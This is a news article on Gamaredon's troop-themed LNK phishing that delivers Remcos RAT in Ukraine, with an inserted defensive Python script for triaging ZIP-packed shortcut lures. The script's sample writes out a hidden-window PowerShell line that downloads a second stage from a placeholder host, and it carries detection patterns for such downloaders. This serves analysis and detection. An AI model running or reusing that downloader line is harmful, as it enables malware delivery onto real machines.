Russia-Linked Gamaredon Uses Troop-Related Lures to Deploy Remcos RAT in Ukraine

April 1, 2025 Ravie Lakshmanan Threat Intelligence / Malware

Entities in Ukraine have been targeted as part of a phishing campaign designed to deliver a remote access trojan called Remcos RAT.

"The file names use Russian words related to the movement of troops in Ukraine as a lure," Cisco Talos researcher Guilherme Venere said in a report published last week. The PowerShell downloader contacts geo-fenced servers located in Russia and Germany to retrieve the second-stage ZIP file containing the Remcos backdoor.

The activity has been attributed with moderate confidence to a Russian hacking group known as Gamaredon, which is also tracked as Aqua Blizzard, Armageddon, Blue Otso, BlueAlpha, Hive0051, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, UAC-0010, UNC530, and Winterflounder.

The threat actor is assessed to be affiliated with Russia's Federal Security Service (FSB), and is known for its espionage and information theft campaigns targeting Ukrainian organizations. It has been active since at least 2013.

The latest campaign is characterized by the distribution of Windows shortcut (LNK) files that are compressed into ZIP archives and disguised as Microsoft Office documents to trick recipients into opening them. The files are believed to be sent via phishing emails.

The two machines used to create the malicious shortcut files had previously been used by the threat actor for similar purposes, which is what links the activity to Gamaredon.

The LNK files contain a PowerShell script that downloads and executes the next-stage payload via the Get-Command cmdlet, and also retrieves a decoy file to maintain the ruse.

The second ZIP archive contains a malicious DLL that is executed via a technique known as DLL side-loading. The DLL is a loader that decrypts and runs the final Remcos payload from encrypted files bundled in the archive.
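The chain described above (ZIP-packed LNK posing as an Office document, a hidden PowerShell window, a downloader built around Get-Command, and attribution through the machines that authored the shortcuts) is something a responder can triage mechanically. The script below is an added example, not Cisco Talos's tooling or any Gamaredon artifact: it builds a constructed sample archive (the file name, command line and URL are hypothetical), parses the Shell Link header, the embedded command line and the TrackerDataBlock, and reports why each entry looks like a lure. The TrackerDataBlock is where the NetBIOS name and MAC address of the creating machine live, which is the kind of metadata that lets analysts tie separate LNK files to the same author workstation.

```python
"""Triage ZIP-packed LNK lures: parse the Shell Link header, the embedded
PowerShell command line and the TrackerDataBlock (creator machine ID / MAC).
Added example with a constructed sample; not Talos code, not a real lure."""
import io
import re
import struct
import uuid
import zipfile

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
TRACKER_SIG = 0xA0000003          # ExtraData TrackerDataBlock signature
SW_SHOWMINNOACTIVE = 7            # ShowCommand value that hides the console window
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))


def build_sample_lnk(target, args, machine_id, mac):
    """Constructed LNK (hypothetical lure): 76-byte ShellLinkHeader,
    RelativePath + Arguments StringData, then a TrackerDataBlock."""
    flags = HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, SW_SHOWMINNOACTIVE, 0, 0, 0, 0)

    def s(text):                  # StringData: CountCharacters + UTF-16LE chars
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    # Droid = volume GUID + file GUID. The file GUID is a UUIDv1 whose node
    # field (last 6 bytes) carries the MAC of the machine that created the link.
    droid = b"\x11" * 16 + b"\x22" * 10 + mac
    tracker = struct.pack("<IIII", 0x60, TRACKER_SIG, 0x58, 0)
    tracker += machine_id.encode().ljust(16, b"\0") + droid + droid
    return header + s(target) + s(args) + tracker + b"\0\0\0\0"  # terminal block


def parse_lnk(data):
    """Return show_command, the StringData fields and creator machine ID / MAC."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    info = {"show_command": struct.unpack_from("<I", data, 60)[0],
            "machine_id": None, "mac": None}
    off = 0x4C
    if flags & HAS_ID_LIST:       # LinkTargetIDList: 2-byte IDListSize, then items
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:     # LinkInfo: starts with its own total size
        off += struct.unpack_from("<I", data, off)[0]
    for bit, key in STRING_FIELDS:
        info[key] = None
        if flags & bit:
            n = struct.unpack_from("<H", data, off)[0]
            off += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[off:off + n * width]
            info[key] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
            off += n * width
    while off + 8 <= len(data):   # ExtraData blocks until a terminal block (< 4)
        blk_size, sig = struct.unpack_from("<II", data, off)
        if blk_size < 4:
            break
        if sig == TRACKER_SIG and blk_size >= 0x60:
            info["machine_id"] = data[off + 16:off + 32].split(b"\0", 1)[0].decode("cp1252")
            file_guid = data[off + 48:off + 64]            # second GUID of Droid
            info["mac"] = ":".join(f"{b:02x}" for b in file_guid[10:16])
        off += blk_size
    return info


PS_RE = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
SUSPICIOUS_RE = re.compile(r"get-command|invoke-expression|\biex\b|\biwr\b|downloadstring|"
                           r"-enc|-w(indowstyle)?\s+hidden|bypass", re.I)
DOC_EXT_RE = re.compile(r"\.(docx?|xlsx?|pptx?|pdf)$", re.I)


def triage_zip(zip_bytes):
    """One finding per .lnk entry in the archive, with the reasons it looks like a lure."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for entry in zf.infolist():
            if not entry.filename.lower().endswith(".lnk"):
                continue
            lnk = parse_lnk(zf.read(entry))
            cmd = f"{lnk['relative_path'] or ''} {lnk['arguments'] or ''}"
            reasons = []
            if DOC_EXT_RE.search(entry.filename[:-4]):
                reasons.append("document double extension")
            if PS_RE.search(cmd):
                reasons.append("launches PowerShell")
            if SUSPICIOUS_RE.search(lnk["arguments"] or ""):
                reasons.append("suspicious PowerShell arguments")
            if lnk["show_command"] == SW_SHOWMINNOACTIVE:
                reasons.append("hidden window (SW_SHOWMINNOACTIVE)")
            findings.append({"entry": entry.filename, "reasons": reasons,
                             "machine_id": lnk["machine_id"], "mac": lnk["mac"],
                             "command": cmd.strip()})
    return findings


def build_sample_zip():
    """Constructed archive mimicking the packaging; name, command and URL are hypothetical."""
    lnk = build_sample_lnk(
        r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        '-w hidden -ep Bypass -c "& (Get-Command iwr) http://example.invalid/stage2.zip'
        ' -OutFile $env:TEMP\\s.zip"',
        "desktop-lure01", bytes.fromhex("000c29aabbcc"))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("troop_redeployment_order.docx.lnk", lnk)
    return buf.getvalue()


if __name__ == "__main__":
    for f in triage_zip(build_sample_zip()):
        print(f"{f['entry']}: {', '.join(f['reasons'])}; creator {f['machine_id']} / {f['mac']}")
```

Run it against a real submission by replacing build_sample_zip() with the archive bytes from the mail attachment. The parser skips the LinkTargetIDList and LinkInfo structures by their own size fields, so it tolerates shortcuts whose target is only in the ID list; the machine ID and MAC are the fields to pivot on when clustering shortcuts across campaigns.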

The disclosure comes as Silent Push detailed a phishing campaign that targets Russian citizens sympathetic to Ukraine. The activity is believed to be the work of Russian intelligence services or a threat actor aligned with Russia.

The campaign comprises four major phishing clusters impersonating the U.S. Central Intelligence Agency (CIA), the Russian Volunteer Corps, Legion Liberty, and Hochuzhit ("I Want to Live"), a hotline run by Ukraine for Russian service members who wish to surrender.

The threat actors use Google Forms and email replies to collect personal information from victims, including their political views, bad habits, and physical fitness. The phishing pages were found to be hosted on a bulletproof hosting provider, Nybula LLC.

"All the campaigns [...] observed have had similar traits and shared a common goal: collecting personal information from site-visiting victims," Silent Push said. "These spoofed honeypots are most likely the creation of Russian intelligence services or a threat actor with Russian interests."
